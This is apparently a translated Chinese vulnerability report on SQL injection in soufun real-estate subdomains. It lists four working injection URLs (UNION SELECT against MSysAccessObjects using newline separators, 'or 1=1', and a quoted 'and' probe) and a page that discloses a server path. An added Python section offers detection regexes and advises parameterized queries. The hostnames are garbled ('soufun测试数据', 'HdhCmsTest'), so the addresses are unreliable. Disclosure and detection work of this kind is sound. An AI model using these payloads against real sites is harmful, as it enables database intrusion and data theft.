Brief description: The injection can lead to disclosure of host-related information and to further penetration. Administrators are urged to fix it promptly so that host security is not affected.

Details:

1. http://njbbs.soufun测试数据/zhuanti/njxn/njxnvote.asp ?num=259%0Aand%0A1=2%0AUNION%0Aall%0ASELECT%0A1,2,9999,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%0Afrom%0AMSysAccessObjects

2. http://nree.soufun测试数据/2007spring/guangzhou/show2.asp ?id=7%0D%0D%0DAnd%0D1=2%0DUNION%0Dall%0DSELECT%0D1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%0Dfrom%0DMSysAccessObjects

3. http://dg.soufun测试数据/zhuanti/yht/view.asp?p_id=13&class_id=21&id=262 or 1=1

4. http://szesftest.soufun测试数据/sechouse2/products.asp ?BigClassName=%B6%FE%CA%D6%B7%BF &SmallClassName=%D5%D0%C9%CC%D6%C3%D2%B5' and '1'='1

Proof of vulnerability:

The four URLs listed under Details, and in addition:

http://HdhCmsTestsoufun测试数据/space/Other/Posts.aspx?userid=5469987

This page discloses the host path:

Source File: e:\soufun\spacen.soufun测试数据\Other\Posts.aspx Line: 6

Line 4: <%@ MasterType VirtualPath="~/Visit.Master" %>
Line 5: <asp:Content ID="TitleContent" ContentPlaceHolderID="TitleContent" runat="server">
Line 6: <%=Master.visitUser.UserName%>- 家庭空间- 搜房网
Line 7: </asp:Content>
Line 8: <asp:Content ID="HeadContent" ContentPlaceHolderID="HeadContent" runat="server">

Fix: filtering

Author: 孤狐浪子
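The first two requests above separate SQL keywords with %0A and %0D instead of spaces, so a filter or log search that looks for keywords with literal spaces misses them. The following is an added example, not part of the original report: a log-review check that decodes and normalises the query string before matching. The rule and function names are hypothetical; the sample queries are the query strings quoted in the report plus one constructed benign request.

```python
import re
from urllib.parse import unquote_to_bytes

# Hypothetical rule names; patterns run on the decoded, whitespace-normalised query.
RULES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "boolean_probe": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+\b"),
    "quoted_probe": re.compile(r"'\s*(?:and|or)\s+'[^']*'\s*=\s*'"),
    "access_system_table": re.compile(r"\bmsys\w+"),
}

def normalise(query: str) -> str:
    """Percent-decode, lower-case, and collapse CR/LF/tab/space runs to one space."""
    raw = unquote_to_bytes(query.replace("+", " "))
    # latin-1 maps every byte to one character, so GBK-encoded values cannot fail.
    return re.sub(r"\s+", " ", raw.decode("latin-1").lower())

def classify(query: str) -> list[str]:
    """Return the sorted names of all rules that match the normalised query."""
    text = normalise(query)
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def naive_filter_hits(query: str) -> bool:
    """Literal-space keyword match on the raw string, shown for contrast."""
    q = query.lower()
    return any(k in q for k in ("union select", " and ", " or "))

# Query strings from the report, plus one constructed benign request.
SAMPLES = {
    "njxnvote": "num=259%0Aand%0A1=2%0AUNION%0Aall%0ASELECT%0A1,2,9999,4,5,6,7,8,9,"
                "10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27"
                "%0Afrom%0AMSysAccessObjects",
    "show2": "id=7%0D%0D%0DAnd%0D1=2%0DUNION%0Dall%0DSELECT%0D1,2,3,4,5,6,7,8,9,10,"
             "11,12,13,14,15,16,17,18,19,20,21%0Dfrom%0DMSysAccessObjects",
    "view": "p_id=13&class_id=21&id=262 or 1=1",
    "products": "BigClassName=%B6%FE%CA%D6%B7%BF &SmallClassName="
                "%D5%D0%C9%CC%D6%C3%D2%B5' and '1'='1",
    "benign (constructed)": "p_id=13&class_id=21&id=262",
}

if __name__ == "__main__":
    for name, query in SAMPLES.items():
        print(f"{name:22} naive={naive_filter_hits(query)!s:5} rules={classify(query)}")
```

Matching like this is for log review and alerting. In the application itself, the durable fix is to bind these parameters in parameterized queries and accept numeric ones such as `num` and `id` only as integers.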